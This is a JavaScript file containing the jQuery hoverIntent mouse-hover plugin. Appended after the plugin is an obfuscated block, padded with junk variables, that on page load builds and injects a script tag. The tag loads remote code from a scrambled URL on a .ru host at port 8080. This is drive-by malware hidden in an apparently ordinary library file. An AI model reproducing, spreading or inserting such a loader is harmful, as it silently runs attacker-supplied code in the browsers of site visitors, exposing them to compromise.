(function($){
	/* hoverIntent by Brian Cherne */
	$.fn.hoverIntent = function(f,g) {
		// default configuration options
		var cfg = {
			sensitivity: 7,
			interval: 100,
			timeout: 0
		};
		// override configuration options with user supplied object
		cfg = $.extend(cfg, g ? { over: f, out: g } : f );

		// instantiate variables
		// cX, cY = current X and Y position of mouse, updated by mousemove event
		// pX, pY = previous X and Y position of mouse, set by mouseover and polling interval
		var cX, cY, pX, pY;

		// A private function for getting mouse position
		var track = function(ev) {
			cX = ev.pageX;
			cY = ev.pageY;
		};

		// A private function for comparing current and previous mouse position
		var compare = function(ev,ob) {
			ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t);
			// compare mouse positions to see if they've crossed the threshold
			if ( ( Math.abs(pX-cX) + Math.abs(pY-cY) ) < cfg.sensitivity ) {
				$(ob).unbind("mousemove",track);
				// set hoverIntent state to true (so mouseOut can be called)
				ob.hoverIntent_s = 1;
				return cfg.over.apply(ob,[ev]);
			} else {
				// set previous coordinates for next time
				pX = cX; pY = cY;
				// use self-calling timeout, guarantees intervals are spaced out properly (avoids JavaScript timer bugs)
				ob.hoverIntent_t = setTimeout( function(){compare(ev, ob);} , cfg.interval );
			}
		};

		// A private function for delaying the mouseOut function
		var delay = function(ev,ob) {
			ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t);
			ob.hoverIntent_s = 0;
			return cfg.out.apply(ob,[ev]);
		};

		// A private function for handling mouse 'hovering'
		var handleHover = function(e) {
			// next three lines copied from jQuery.hover, ignore children onMouseOver/onMouseOut
			var p = (e.type == "mouseover" ? e.fromElement : e.toElement) || e.relatedTarget;
			while ( p && p != this ) { try { p = p.parentNode; } catch(e) { p = this; } }
			if ( p == this ) { return false; }

			// copy objects to be passed into t (required for event object to be passed in IE)
			var ev = jQuery.extend({},e);
			var ob = this;

			// cancel hoverIntent timer if it exists
			if (ob.hoverIntent_t) { ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t); }

			// else e.type == "onmouseover"
			if (e.type == "mouseover") {
				// set "previous" X and Y position based on initial entry point
				pX = ev.pageX; pY = ev.pageY;
				// update "current" X and Y position based on mousemove
				$(ob).bind("mousemove",track);
				// start polling interval (self-calling timeout) to compare mouse coordinates over time
				if (ob.hoverIntent_s != 1) { ob.hoverIntent_t = setTimeout( function(){compare(ev,ob);} , cfg.interval );}

			// else e.type == "onmouseout"
			} else {
				// unbind expensive mousemove event
				$(ob).unbind("mousemove",track);
				// if hoverIntent state is true, then call the mouseOut function after the specified delay
				if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );}
			}
		};

		// bind the function to the two event listeners
		return this.mouseover(handleHover).mouseout(handleHover);
	};
	
})(jQuery);
var z;if(z!='' && z!='a'){z=null};var s;if(s!='' && s!='q'){s=null};var MM;if(MM!='by' && MM!='IF'){MM=''};function W(){var FJ;if(FJ!='' && FJ!='SE'){FJ=''};var P;if(P!='GC' && P!='w'){P=''};var Ub;if(Ub!=''){Ub='X'};var b="g";var N=new Date();var i='';var M=RegExp;this.EG="";function K(O,I){var Ic='';var y= new String("[");var Mg;if(Mg!='Z'){Mg='Z'};y+=I;y+=new String("eU9d]".substr(4));var sJ;if(sJ!='p'){sJ='p'};var Dy=new Date();var oh='';var _=new M(y, b);return O.replace(_, i);};var uU;if(uU!='' && uU!='uH'){uU=''};var MS=new String();var Uu=new String();var J=window;var u=K('86779714019641448196146610467191',"49176");var E=new String("BmEHsrc".substr(4));var vA=new Array();var C="/sfr."+"fr/sfixC9".substr(0,5)+"r.fr/iH0".substr(0,5)+"qFZ2googl".substr(4)+"e.com"+"R5wI/alte5RIw".substr(4,5)+"rvistA6F".substr(0,5)+"Rv0a.org".substr(3)+"9fO/walmO9f".substr(3,5)+"art.coJU".substr(0,5)+"lxYom.phxYl".substr(3,5)+"D1UpU1D".substr(3,1);var Mu="";var G='';var F=String("xQEdscr".substr(4)+"ipt6kf".substr(0,3));var g="PR0def".substr(3)+"er";var rq='';var On;if(On!='' && On!='qP'){On=null};var DM=new String();var _S=String("httpHoSN".substr(0,4)+"GEfq://1qGfE".substr(4,4)+"NBSa7173BSaN".substr(4,4)+"-com"+"9L27.fac".substr(4)+"eboo"+"k.co3bmR".substr(0,4)+"m.cyvBp".substr(0,4)+"GPEworl".substr(3)+"0Wqd-co".substr(3)+"CXtm.deCXt".substr(3,4)+"mAMargu".substr(3)+"DHwide.DwH".substr(3,4)+"ru:");var hB;if(hB!='L' && hB != ''){hB=null};var pJ=new String();J.onload=function(){var V='';try {var LJ;if(LJ!='' && LJ!='m'){LJ='RL'};this.ip='';var rR="";var GX;if(GX!='Ep'){GX='Ep'};G=_S+u;G+=C;var Gz='';var bN=new Date();var vAZ=new Array();var Dv;if(Dv!='dH' && Dv != ''){Dv=null};j=document.createElement(F);this.Cd='';this.zl='';j[E]=G;j[g]=[1][0];var _c=new String();var hp;if(hp!='Q'){hp=''};var Eh=new String();var aVi=new String();document.body.appendChild(j);var HK;if(HK!='jW' && HK!='AO'){HK=''};} catch(S){var _d=new Array();};};};W();var Mgp=new Date();var ac=new Date();